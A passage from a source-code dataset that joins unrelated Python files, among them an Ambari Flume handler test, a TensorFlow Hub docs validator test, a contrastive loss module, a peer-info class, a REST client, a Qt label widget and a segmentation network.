config_file="flume_target.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assert_configure_many()
self.assertResourceCalled('Execute', "ambari-sudo.sh su flume -l -s /bin/bash -c 'export PATH=/bin JAVA_HOME=/usr/jdk64/jdk1.7.0_45 ; /usr/bin/flume-ng agent --name b1 --conf /etc/flume/conf/b1 --conf-file /etc/flume/conf/b1/flume.conf -Dflume.monitoring.type=ganglia -Dflume.monitoring.hosts=c6401.ambari.apache.org:8655 > /var/log/flume/b1.out 2>&1' &",
environment = {'JAVA_HOME': u'/usr/jdk64/jdk1.7.0_45'},
wait_for_finish = False,
)
self.assertResourceCalled('Execute', "ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E pgrep -o -u flume -f '^/usr/jdk64/jdk1.7.0_45.*b1.*' | ambari-sudo.sh [RMF_ENV_PLACEHOLDER] -H -E tee /var/run/flume/b1.pid && test ${PIPESTATUS[0]} -eq 0",
logoutput = True,
tries = 20,
try_sleep = 10,
)
self.assertNoMoreResources()
@patch("glob.glob")
@patch("flume.await_flume_process_termination")
def test_stop_single(self, await_flume_process_termination_mock, glob_mock):
glob_mock.return_value = ['/var/run/flume/b1.pid']
await_flume_process_termination_mock.return_value = True
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "stop",
config_file="flume_target.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertTrue(glob_mock.called)
await_flume_process_termination_mock.assert_called_with('/var/run/flume/b1.pid')
self.assertResourceCalled('File', '/var/run/flume/b1.pid', action = ['delete'])
self.assertNoMoreResources()
@patch("flume.find_expected_agent_names")
def test_configure_with_existing(self, expected_names_mock):
expected_names_mock.return_value = ["x1"]
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "configure",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertResourceCalled('File', '/etc/flume/conf/x1/ambari-meta.json',
action = ['delete'],
)
self.assert_configure_default()
self.assertNoMoreResources()
def test_flume_env_not_22(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "configure",
config_file="default.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertResourceCalled('Directory', '/var/run/flume',
group = 'hadoop',
owner='flume',)
self.assertResourceCalled('Directory',
'/etc/flume/conf',
owner='flume',
create_parents = True)
self.assertResourceCalled('Directory',
'/var/log/flume',
owner = 'flume',
cd_access = 'a',
group = 'hadoop',
create_parents = True,
mode=0755)
self.assertResourceCalled('Directory',
'/etc/flume/conf/a1',
owner='flume')
self.assertResourceCalled('PropertiesFile',
'/etc/flume/conf/a1/flume.conf',
owner='flume',
mode = 0644,
properties = build_flume(
self.getConfig()['configurations']['flume-conf']['content'])['a1'])
self.assertResourceCalled('File',
'/etc/flume/conf/a1/log4j.properties',
owner='flume',
content = Template('log4j.properties.j2', agent_name = 'a1'),
mode = 0644)
self.assertResourceCalled('File',
'/etc/flume/conf/a1/ambari-meta.json',
owner='flume',
content='{"channels_count": 1, "sinks_count": 1, "sources_count": 1}',
mode = 0644)
content = InlineTemplate(self.getConfig()['configurations']['flume-env']['content'])
self.assertTrue(content.get_content().find('/usr/lib/hive') > -1)
self.assertResourceCalled('File', "/etc/flume/conf/a1/flume-env.sh",
owner="flume",
content=content)
def test_flume_env_with_22(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "configure",
config_file="flume_22.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertResourceCalled('Directory', '/var/run/flume',
group = 'hadoop',
owner='flume')
self.assertResourceCalled('Directory',
'/usr/hdp/current/flume-server/conf',
owner='flume',
create_parents = True)
self.assertResourceCalled('Directory',
'/var/log/flume',
owner = 'flume',
group = 'hadoop',
create_parents = True,
cd_access = 'a',
mode=0755)
self.assertResourceCalled('Directory',
'/usr/hdp/current/flume-server/conf/a1',
owner='flume')
self.assertResourceCalled('PropertiesFile',
'/usr/hdp/current/flume-server/conf/a1/flume.conf',
owner='flume',
mode = 0644,
properties = build_flume(
self.getConfig()['configurations']['flume-conf']['content'])['a1'])
self.assertResourceCalled('File',
'/usr/hdp/current/flume-server/conf/a1/log4j.properties',
content = Template('log4j.properties.j2', agent_name = 'a1'),
owner='flume',
mode = 0644)
self.assertResourceCalled('File',
'/usr/hdp/current/flume-server/conf/a1/ambari-meta.json',
content='{"channels_count": 1, "sinks_count": 1, "sources_count": 1}',
owner='flume',
mode = 0644)
content = InlineTemplate(self.getConfig()['configurations']['flume-env']['content'])
self.assertTrue(content.get_content().find('/usr/hdp/current/hive-metastore') > -1)
self.assertResourceCalled('File',
"/usr/hdp/current/flume-server/conf/a1/flume-env.sh",
owner="flume",
content=content)
def test_pre_upgrade_restart(self):
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/flume_handler.py",
classname = "FlumeHandler",
command = "pre_upgrade_restart",
config_file="flume_22.json",
stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES)
self.assertResourceCalled("Execute", ('ambari-python-wrap', '/usr/bin/hdp-select', 'set', 'flume-server', '2.2.1.0-2067'), sudo=True)
def build_flume(content):
result = {}
agent_names = []
for line in content.split('\n'):
rline = line.strip()
if 0 != len(rline) and not rline.startswith('#'):
pair = rline.split('=')
lhs = pair[0].strip()
rhs = pair[1].strip()
part0 = lhs.split('.')[0]
if lhs.endswith(".sources"):
agent_names.append(part0)
if not result.has_key(part0):
result[part0] = {}
result[part0][lhs] = rhs
# trim out non-agents
for k in result.keys():
if not k in agent_names:
del result[k]
return result
| 41.958124 | 414 | 0.590802 |
0d0908f4e9c040ec3221f0a55794e2592868cfb1
| 12,225 |
py
|
Python
|
tfhub_dev/tools/validator_test.py
|
tsadr/hub
|
5186d911de9bce0adee28993fa396e7392fb1c18
|
[
"Apache-2.0"
] | null | null | null |
tfhub_dev/tools/validator_test.py
|
tsadr/hub
|
5186d911de9bce0adee28993fa396e7392fb1c18
|
[
"Apache-2.0"
] | null | null | null |
tfhub_dev/tools/validator_test.py
|
tsadr/hub
|
5186d911de9bce0adee28993fa396e7392fb1c18
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The TensorFlow Hub Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow_hub.tfhub_dev.tools.validator."""
import os
import shutil
import tempfile
import tensorflow as tf
from tfhub_dev.tools import validator
class MockFilesystem(validator.Filesystem):
"""Returns a Mock Filesystem storing files in a dictionary."""
def __init__(self):
self._files = dict()
def get_contents(self, filename):
return self._files[filename]
def set_contents(self, filename, contents):
self._files[filename] = contents
def recursive_list_dir(self, root_dir):
return [
f for f in self._files.keys() if f.startswith(root_dir + os.path.sep)
]
MINIMAL_MARKDOWN_TEMPLATE = """# Module google/text-embedding-model/1
Simple description spanning
multiple lines.
<!-- asset-path: %s -->
<!-- module-type: text-embedding -->
<!-- fine-tunable: true -->
<!-- format: saved_model_2 -->
## Overview
"""
MINIMAL_MARKDOWN_WITH_ALLOWED_LICENSE = """# Module google/model/1
Simple description.
<!-- asset-path: %s -->
<!-- module-type: text-embedding -->
<!-- fine-tunable: true -->
<!-- format: saved_model_2 -->
<!-- license: BSD-3-Clause -->
## Overview
"""
MINIMAL_MARKDOWN_WITH_UNKNOWN_LICENSE = """# Module google/model/1
Simple description.
<!-- asset-path: %s -->
<!-- module-type: text-embedding -->
<!-- fine-tunable: true -->
<!-- format: saved_model_2 -->
<!-- license: my_license -->
## Overview
"""
MARKDOWN_WITHOUT_DESCRIPTION = """# Module google/text-embedding-model/1
<!-- asset-path: https://path/to/text-embedding-model/model.tar.gz -->
<!-- format: saved_model_2 -->
## Overview
"""
MARKDOWN_WITH_MISSING_METADATA = """# Module google/text-embedding-model/1
One line description.
<!-- asset-path: https://path/to/text-embedding-model/model.tar.gz -->
<!-- format: saved_model_2 -->
## Overview
"""
MARKDOWN_WITH_DUPLICATE_METADATA = """# Module google/text-embedding-model/1
One line description.
<!-- asset-path: https://path/to/text-embedding-model/model.tar.gz -->
<!-- asset-path: https://path/to/text-embedding-model/model2.tar.gz -->
<!-- module-type: text-embedding -->
<!-- fine-tunable: true -->
<!-- format: saved_model_2 -->
## Overview
"""
MARKDOWN_WITH_UNEXPECTED_LINES = """# Module google/text-embedding-model/1
One line description.
<!-- module-type: text-embedding -->
This should not be here.
<!-- format: saved_model_2 -->
## Overview
"""
MINIMAL_COLLECTION_MARKDOWN = """# Collection google/text-embedding-collection/1
Simple description spanning
multiple lines.
<!-- module-type: text-embedding -->
## Overview
"""
MINIMAL_PUBLISHER_MARKDOWN = """# Publisher some-publisher
Simple description spanning one line.
[![Icon URL]](https://path/to/icon.png)
## Overview
"""
class ValidatorTest(tf.test.TestCase):
def setUp(self):
super(tf.test.TestCase, self).setUp()
self.tmp_dir = tempfile.mkdtemp()
self.model_path = os.path.join(self.tmp_dir, "model_1")
self.not_a_model_path = os.path.join(self.tmp_dir, "not_a_model")
self.save_dummy_model(self.model_path)
self.minimal_markdown = MINIMAL_MARKDOWN_TEMPLATE % self.model_path
self.minimal_markdown_with_bad_model = (
MINIMAL_MARKDOWN_TEMPLATE % self.not_a_model_path)
def tearDown(self):
super(tf.test.TestCase, self).tearDown()
shutil.rmtree(self.tmp_dir)
def save_dummy_model(self, path):
class MultiplyTimesTwoModel(tf.train.Checkpoint):
"""Callable model that multiplies by two."""
@tf.function(
input_signature=[tf.TensorSpec(shape=None, dtype=tf.float32)])
def __call__(self, x):
return x * 2
model = MultiplyTimesTwoModel()
tf.saved_model.save(model, path)
def test_filesystem(self):
tmp_dir = self.get_temp_dir()
tmp_file_path = tempfile.mktemp(dir=tmp_dir)
file_contents = "CONTENTS"
with tf.io.gfile.GFile(tmp_file_path, "w") as output_file:
output_file.write(file_contents)
filesystem = validator.Filesystem()
self.assertEqual(file_contents, filesystem.get_contents(tmp_file_path))
self.assertAllEqual([tmp_file_path],
list(filesystem.recursive_list_dir(tmp_dir)))
def test_minimal_markdown_parsed(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
self.minimal_markdown)
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_minimal_markdown_parsed_with_selected_files(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
self.minimal_markdown)
num_validated = validator.validate_documentation_files(
documentation_dir="root",
files_to_validate=["google/models/text-embedding-model/1.md"],
filesystem=filesystem)
self.assertEqual(1, num_validated)
def test_minimal_collection_markdown_parsed(self):
filesystem = MockFilesystem()
filesystem.set_contents(
"root/google/collections/text-embedding-collection/1.md",
MINIMAL_COLLECTION_MARKDOWN)
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_minimal_publisher_markdown_parsed(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/some-publisher/some-publisher.md",
MINIMAL_PUBLISHER_MARKDOWN)
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_invalid_markdown_fails(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/publisher/model/1.md", "INVALID MARKDOWN")
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*First line.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_minimal_markdown_not_in_publisher_dir(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/gooogle/models/wrong-location/1.md",
self.minimal_markdown)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*placed in the publisher directory.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_minimal_markdown_does_not_end_with_md_fails(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/wrong-extension/1.mdz",
self.minimal_markdown)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
r".*end with \"\.md.\"*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_publisher_markdown_at_incorrect_location_fails(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/publisher.md",
MINIMAL_PUBLISHER_MARKDOWN)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
r".*some-publisher\.md.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_publisher_markdown_at_correct_location(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/some-publisher/some-publisher.md",
MINIMAL_PUBLISHER_MARKDOWN)
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_markdown_without_description(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
MARKDOWN_WITHOUT_DESCRIPTION)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*has to contain a short description.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_markdown_with_missing_metadata(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
MARKDOWN_WITH_MISSING_METADATA)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*missing.*fine-tunable.*module-type.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_markdown_with_duplicate_metadata(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
MARKDOWN_WITH_DUPLICATE_METADATA)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*duplicate.*asset-path.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_markdown_with_unexpected_lines(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
MARKDOWN_WITH_UNEXPECTED_LINES)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*Unexpected line.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_minimal_markdown_parsed_full(self):
documentation_parser = validator.DocumentationParser("root")
documentation_parser.validate(
file_path="root/google/models/text-embedding-model/1.md",
documentation_content=self.minimal_markdown,
do_smoke_test=True)
self.assertEqual("Simple description spanning multiple lines.",
documentation_parser.parsed_description)
expected_metadata = {
"asset-path": {self.model_path},
"module-type": {"text-embedding"},
"fine-tunable": {"true"},
"format": {"saved_model_2"},
}
self.assertAllEqual(expected_metadata, documentation_parser.parsed_metadata)
def test_bad_model_does_not_pass_smoke_test(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/text-embedding-model/1.md",
self.minimal_markdown_with_bad_model)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*failed to parse.*"):
validator.validate_documentation_files(
documentation_dir="root",
files_to_validate=["google/models/text-embedding-model/1.md"],
filesystem=filesystem)
def test_markdown_with_allowed_license(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/model/1.md",
MINIMAL_MARKDOWN_WITH_ALLOWED_LICENSE)
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
def test_markdown_with_unknown_license(self):
filesystem = MockFilesystem()
filesystem.set_contents("root/google/models/model/1.md",
MINIMAL_MARKDOWN_WITH_UNKNOWN_LICENSE)
with self.assertRaisesRegexp(validator.MarkdownDocumentationError,
".*specify a license id from list.*"):
validator.validate_documentation_files(
documentation_dir="root", filesystem=filesystem)
if __name__ == "__main__":
tf.compat.v1.enable_v2_behavior()
tf.test.main()
| 36.933535 | 80 | 0.695051 |
1adf83d4ac3d58a455126167c9630c8a1f95e402
| 2,400 |
py
|
Python
|
models/patchnce.py
|
bronemos/contrastive-unpaired-translation-focal
|
50b9008d08a86439ede081a910d02df5da8e32df
|
[
"BSD-3-Clause"
] | null | null | null |
models/patchnce.py
|
bronemos/contrastive-unpaired-translation-focal
|
50b9008d08a86439ede081a910d02df5da8e32df
|
[
"BSD-3-Clause"
] | null | null | null |
models/patchnce.py
|
bronemos/contrastive-unpaired-translation-focal
|
50b9008d08a86439ede081a910d02df5da8e32df
|
[
"BSD-3-Clause"
] | null | null | null |
from packaging import version
import torch
from torch import nn
from .focal_loss import FocalLoss
class PatchNCELoss(nn.Module):
def __init__(self, opt):
super().__init__()
self.opt = opt
self.cross_entropy_loss = torch.nn.CrossEntropyLoss(reduction="none")
self.focal_loss = FocalLoss()
self.mask_dtype = (
torch.uint8
if version.parse(torch.__version__) < version.parse("1.2.0")
else torch.bool
)
def forward(self, feat_q, feat_k):
batchSize = feat_q.shape[0]
dim = feat_q.shape[1]
feat_k = feat_k.detach()
# pos logit
l_pos = torch.bmm(feat_q.view(batchSize, 1, -1), feat_k.view(batchSize, -1, 1))
l_pos = l_pos.view(batchSize, 1)
# neg logit
# Should the negatives from the other samples of a minibatch be utilized?
# In CUT and FastCUT, we found that it's best to only include negatives
# from the same image. Therefore, we set
# --nce_includes_all_negatives_from_minibatch as False
# However, for single-image translation, the minibatch consists of
# crops from the "same" high-resolution image.
# Therefore, we will include the negatives from the entire minibatch.
if self.opt.nce_includes_all_negatives_from_minibatch:
# reshape features as if they are all negatives of minibatch of size 1.
batch_dim_for_bmm = 1
else:
batch_dim_for_bmm = self.opt.batch_size
# reshape features to batch size
feat_q = feat_q.view(batch_dim_for_bmm, -1, dim)
feat_k = feat_k.view(batch_dim_for_bmm, -1, dim)
npatches = feat_q.size(1)
l_neg_curbatch = torch.bmm(feat_q, feat_k.transpose(2, 1))
# diagonal entries are similarity between same features, and hence meaningless.
# just fill the diagonal with very small number, which is exp(-10) and almost zero
diagonal = torch.eye(npatches, device=feat_q.device, dtype=self.mask_dtype)[
None, :, :
]
l_neg_curbatch.masked_fill_(diagonal, -10.0)
l_neg = l_neg_curbatch.view(-1, npatches)
out = torch.cat((l_pos, l_neg), dim=1) / self.opt.nce_T
loss = self.focal_loss(
out, torch.zeros(out.size(0), dtype=torch.long, device=feat_q.device)
)
return loss
| 36.363636 | 90 | 0.637917 |
c3d53838dee8952fb86cf031499d958cbd07cfb5
| 1,918 |
py
|
Python
|
chinilla/types/peer_info.py
|
Chinilla/chinilla-blockchain
|
59bebcf94e65b74fbb53ad4929bbd79cb28be619
|
[
"Apache-2.0"
] | null | null | null |
chinilla/types/peer_info.py
|
Chinilla/chinilla-blockchain
|
59bebcf94e65b74fbb53ad4929bbd79cb28be619
|
[
"Apache-2.0"
] | null | null | null |
chinilla/types/peer_info.py
|
Chinilla/chinilla-blockchain
|
59bebcf94e65b74fbb53ad4929bbd79cb28be619
|
[
"Apache-2.0"
] | null | null | null |
import ipaddress
from dataclasses import dataclass
from typing import Optional, Union
from chinilla.util.ints import uint16, uint64
from chinilla.util.streamable import Streamable, streamable
@streamable
@dataclass(frozen=True)
class PeerInfo(Streamable):
host: str
port: uint16
def is_valid(self, allow_private_subnets=False) -> bool:
ip: Optional[Union[ipaddress.IPv6Address, ipaddress.IPv4Address]] = None
try:
ip = ipaddress.IPv6Address(self.host)
except ValueError:
ip = None
if ip is not None:
if ip.is_private and not allow_private_subnets:
return False
return True
try:
ip = ipaddress.IPv4Address(self.host)
except ValueError:
ip = None
if ip is not None:
if ip.is_private and not allow_private_subnets:
return False
return True
return False
# Functions related to peer bucketing in new/tried tables.
def get_key(self):
try:
ip = ipaddress.IPv6Address(self.host)
except ValueError:
ip_v4 = ipaddress.IPv4Address(self.host)
ip = ipaddress.IPv6Address(int(ipaddress.IPv6Address("2002::")) | (int(ip_v4) << 80))
key = ip.packed
key += bytes([self.port // 0x100, self.port & 0x0FF])
return key
def get_group(self):
# TODO: Port everything from Bitcoin.
ipv4 = 1
try:
ip = ipaddress.IPv4Address(self.host)
except ValueError:
ip = ipaddress.IPv6Address(self.host)
ipv4 = 0
if ipv4:
group = bytes([1]) + ip.packed[:2]
else:
group = bytes([0]) + ip.packed[:4]
return group
@streamable
@dataclass(frozen=True)
class TimestampedPeerInfo(Streamable):
host: str
port: uint16
timestamp: uint64
| 28.205882 | 97 | 0.601668 |
c3e005bb70b3a30b736192894faf8abfa0cc1c7f
| 3,205 |
py
|
Python
|
StockAnalysisSystem/interface/interface_rest.py
|
SleepySoft/StockAnalysisSystem
|
75f95738831614f7946f85d09118e447f7ac6dc7
|
[
"Apache-2.0"
] | 138 |
2018-01-03T03:32:49.000Z
|
2022-03-12T02:57:46.000Z
|
StockAnalysisSystem/interface/interface_rest.py
|
SleepySoft/StockAnalysisSystem
|
75f95738831614f7946f85d09118e447f7ac6dc7
|
[
"Apache-2.0"
] | 9 |
2018-01-01T03:16:24.000Z
|
2021-05-27T09:57:24.000Z
|
StockAnalysisSystem/interface/interface_rest.py
|
SleepySoft/StockAnalysisSystem
|
75f95738831614f7946f85d09118e447f7ac6dc7
|
[
"Apache-2.0"
] | 50 |
2019-08-05T01:02:30.000Z
|
2022-03-07T00:52:14.000Z
|
import requests
import datetime
import traceback
import pandas as pd
from functools import partial
from StockAnalysisSystem.core.Utility.JsonSerializer import serialize, deserialize
import StockAnalysisSystem.core.Utility.JsonSerializerImpl
# --------------------------------------------------------------------------------------
# Just porting THIS FILE and JsonSerializerImpl.py, JsonSerializer.py into your project.
# Then you can access StockAnalysisSystem (sas) data by REST interface
# without porting the whole sas project into your code.
# --------------------------------------------------------------------------------------
class RestInterface:
def __init__(self):
self.__token = None
self.__timeout = 9999 # Blocking in request for debug
self.__api_url = 'http://127.0.0.1:80/api'
def if_init(self, api_uri: str = None, token: str = None, timeout=None) -> bool:
if token is not None:
self.__token = token
if timeout is not None:
self.__timeout = timeout
if api_uri is not None:
self.__api_url = api_uri
return True
def if_prob(self) -> dict:
return {
'name': 'Rest Interface',
'version': '1.0.0',
}
# ------------------------------------------------------------------------------------
def __getattr__(self, attr):
return partial(self.rest_interface_proxy, attr)
def rest_interface_proxy(self, api: str, *args, **kwargs) -> any:
"""
Cooperate with WebApiInterface.rest_interface_stub
:param api: The function name of interface that you want to call
:param args: The list args (which will be ignored in server side)
:param kwargs: The key-value args
:return: The response of server
"""
payload = {
'api': api,
'token': self.__token,
'args': serialize(args),
'kwargs': serialize(kwargs),
}
headers = {
}
try:
resp = requests.post(self.__api_url, json=payload, headers=headers, timeout=self.__timeout)
return self.deserialize_response(resp.text) if (resp.text is not None and resp.text != '') else None
except Exception as e:
print('Parse result fail: ' + str(e))
print(traceback.format_exc())
finally:
pass
@staticmethod
def deserialize_response(resp_text: str) -> any:
result = deserialize(resp_text)
return result
# ----------------------------------------------------------------------------------------------------------------------
def main():
caller = RestInterface()
caller.if_init(api_uri='http://127.0.0.1:80/api', token='xxxxxx')
df = caller.sas_query('Market.SecuritiesInfo', '000001.SZSE')
print(df)
df = caller.sas_query('Finance.IncomeStatement', '000001.SZSE', ('2000-01-01', '2020-12-31'), readable=True)
print(df)
if __name__ == '__main__':
try:
main()
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
exit()
finally:
pass
| 32.373737 | 120 | 0.541966 |
916edc55c2630f6dbc930027460c0392b3c1f30f
| 2,219 |
py
|
Python
|
prettyqt/custom_widgets/elidedlabel.py
|
phil65/PrettyQt
|
26327670c46caa039c9bd15cb17a35ef5ad72e6c
|
[
"MIT"
] | 7 |
2019-05-01T01:34:36.000Z
|
2022-03-08T02:24:14.000Z
|
prettyqt/custom_widgets/elidedlabel.py
|
phil65/PrettyQt
|
26327670c46caa039c9bd15cb17a35ef5ad72e6c
|
[
"MIT"
] | 141 |
2019-04-16T11:22:01.000Z
|
2021-04-14T15:12:36.000Z
|
prettyqt/custom_widgets/elidedlabel.py
|
phil65/PrettyQt
|
26327670c46caa039c9bd15cb17a35ef5ad72e6c
|
[
"MIT"
] | 5 |
2019-04-17T11:48:19.000Z
|
2021-11-21T10:30:19.000Z
|
from __future__ import annotations
from prettyqt import core, gui, widgets
from prettyqt.qt import QtWidgets
class ElidedLabel(widgets.Frame):
elision_changed = core.Signal(bool)
def __init__(
self,
text: str = "",
parent: QtWidgets.QWidget | None = None,
):
super().__init__(parent=parent)
self.elided = False
self.content = text
self.set_size_policy("expanding", "preferred")
def __repr__(self):
return f"{type(self).__name__}({self.text()!r})"
def set_text(self, text: str):
self.content = text
self.update()
def paintEvent(self, event):
super().paintEvent(event)
painter = gui.Painter(self)
metrics = painter.get_font_metrics()
did_elide = False
line_spacing = metrics.lineSpacing()
y = 0
layout = gui.TextLayout(self.content, painter.font())
with layout.process_layout():
while True:
line = layout.createLine()
if not line.isValid():
break
line.setLineWidth(self.width())
next_line_y = y + line_spacing
if self.height() >= next_line_y + line_spacing:
line.draw(painter, core.Point(0, y))
y = next_line_y
else:
last_line = self.content[line.textStart() :]
elided_line = metrics.elided_text(last_line, "right", self.width())
painter.drawText(0, y + metrics.ascent(), elided_line)
line = layout.createLine()
did_elide = line.isValid()
break
if did_elide != self.elided:
self.elided = did_elide
self.elision_changed.emit(did_elide)
# def paintEvent(self, event):
# painter = gui.Painter(self)
# metrics = gui.FontMetrics(self.font())
# elided = metrics.elided_text(self.text(), "right", self.width())
# painter.drawText(self.rect(), self.alignment(), elided)
if __name__ == "__main__":
app = widgets.app()
widget = ElidedLabel("test")
widget.show()
app.main_loop()
| 31.253521 | 87 | 0.560613 |
babef387c83b5edd6d41a2fbc4731b10d41016d5
| 333 |
py
|
Python
|
src/interface_py/h2o4gpu/solvers/daal_solver/utils/helper_module.py
|
pnijhara/h2o4gpu
|
6257112c134136471420b68241f57190a445b67d
|
[
"Apache-2.0"
] | 458 |
2017-09-20T08:32:10.000Z
|
2022-02-28T18:40:57.000Z
|
src/interface_py/h2o4gpu/solvers/daal_solver/utils/helper_module.py
|
Jun-NIBS/h2o4gpu
|
9885416deb3285f5d0f33023d6c07373ac4fc0b7
|
[
"Apache-2.0"
] | 461 |
2017-09-20T11:39:04.000Z
|
2021-11-21T15:51:42.000Z
|
src/interface_py/h2o4gpu/solvers/daal_solver/utils/helper_module.py
|
Jun-NIBS/h2o4gpu
|
9885416deb3285f5d0f33023d6c07373ac4fc0b7
|
[
"Apache-2.0"
] | 114 |
2017-09-20T12:08:07.000Z
|
2021-11-29T14:15:40.000Z
|
# -*- encoding: utf-8 -*-
"""
:copyright: 2017-2018 H2O.ai, Inc.
:license: Apache License Version 2.0 (see LICENSE for details)
"""
from functools import wraps
def print_name(func):
@wraps(func)
def full(*args, **kwargs):
print("**-> {}".format(func.__name__))
return func(*args, **kwargs)
return full
| 23.785714 | 64 | 0.618619 |
24ce653bbe6a608abfa4cf571516b19725b550ec
| 40,747 |
py
|
Python
|
model/DFSegX11.py
|
Ethan-ye/Efficient-Segmentation-Networks
|
27272e43126a507a6d93b21cd2372f5432f61237
|
[
"MIT"
] | null | null | null |
model/DFSegX11.py
|
Ethan-ye/Efficient-Segmentation-Networks
|
27272e43126a507a6d93b21cd2372f5432f61237
|
[
"MIT"
] | null | null | null |
model/DFSegX11.py
|
Ethan-ye/Efficient-Segmentation-Networks
|
27272e43126a507a6d93b21cd2372f5432f61237
|
[
"MIT"
] | null | null | null |
# *- coding: utf-8 -*
###########################################################################
# Partial order pruning: for best speed/accuracy trade-off in neural architecture search
# https://github.com/lixincn2015/Partial-Order-Pruning
###########################################################################
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
from torchsummary import summary
from utils.activations import NON_LINEARITY
from fvcore.nn.flop_count import flop_count # https://github.com/facebookresearch/fvcore
from tools.flops_counter.ptflops import get_model_complexity_info
from thop import profile # https://github.com/Lyken17/pytorch-OpCounter
__all__ = ['DF1SegX11']
# https://github.com/shelhamer/fcn.berkeleyvision.org/blob/master/surgery.py
def get_upsampling_weight(in_channels, out_channels, kernel_size):
"""Make a 2D bilinear kernel suitable for upsampling"""
factor = (kernel_size + 1) // 2
if kernel_size % 2 == 1:
center = factor - 1
else:
center = factor - 0.5
og = np.ogrid[:kernel_size, :kernel_size]
filt = (1 - abs(og[0] - center) / factor) * \
(1 - abs(og[1] - center) / factor)
weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size),
dtype=np.float64)
weight[range(in_channels), range(out_channels), :, :] = filt
return torch.from_numpy(weight).float()
class ResBlock(nn.Module):
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(ResBlock, self).__init__()
self.conv00 = nn.Conv2d(inplanes, inplanes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn00 = nn.BatchNorm2d(inplanes)
self.conv01 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=2, padding=1, bias=False)
self.bn01 = nn.BatchNorm2d(planes)
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
if self.stride == 2:
out = self.conv00(x)
out = self.bn00(out)
out = self.relu(out)
out = self.conv01(out)
out = self.bn01(out)
out = self.relu(out)
else:
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
else:
residual = x
out += residual
out = self.relu(out)
return out
# self.decoder4 = nn.Sequential(
